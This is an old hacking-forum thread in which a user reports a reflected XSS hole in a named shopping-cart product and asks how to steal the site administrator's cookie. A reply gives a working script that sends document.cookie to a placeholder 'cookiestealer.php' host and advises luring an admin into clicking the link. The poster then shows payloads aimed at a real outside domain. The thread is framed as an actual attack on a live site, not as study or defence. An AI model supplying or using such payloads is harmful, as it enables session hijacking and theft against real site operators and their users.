Follow us on Twitter!
The important thing is not to stop questioning. - Albert Einstein
Thursday, April 17, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 19
Guests Online: 19
Members Online: 0

Registered Members: 82813
Newest Member: VesuviusSentinel
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

XSS help


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 10-10-05 14:41
hey guys I just found out that Hassan Consulting's Shopping Cart Version 1.52 is vulnerable to XSS, i was just playing around when i got to this page thats like
Code
/cgi-local/shop.pl/page=



so i tried
Code
/cgi-local/shop.pl/page=<script>alert('XSS')</script>



and i got an alert box saying XSS.
so i was wondering if you guys could help me out a little bit cause I am not much familier with XSS how do i get the admin's cookie, i have a cookie stealer on my site.

And I was wondering if its possible to view file's content by doing
Code
/cgi-local/shop.pl/file=the directory of the files



and the alert box works with this too
Code
/cgi-local/shop.pl/file=<script>alert('XSS')</script>




Edited by on 10-10-05 14:42
Author

RE: XSS help


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 10-10-05 16:30
Well, you could use this script:

window.location="http://www.yourhost.com/cookiestealer.php?"+document.cookie

where cookiestealer.php takes address line input, like GET and saves it to a log file.

Then, you just get an admin to click that link.


Author

RE: XSS help


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 10-10-05 16:46
ok i'll try that , thanks alot

EDIT: Ok i tried it but it doesnt work
Code
cgi-local/shop.pl/page=<script>window.location('http://projectx.t35.com/about.php?c='+ document.cookie</script>
and this
cgi-local/shop.pl/page=<script>window.location="http://projectx.t35.com/about.php?c="+document.cookie</script>



thats what i typed and nothing happens

Edited by on 10-10-05 16:59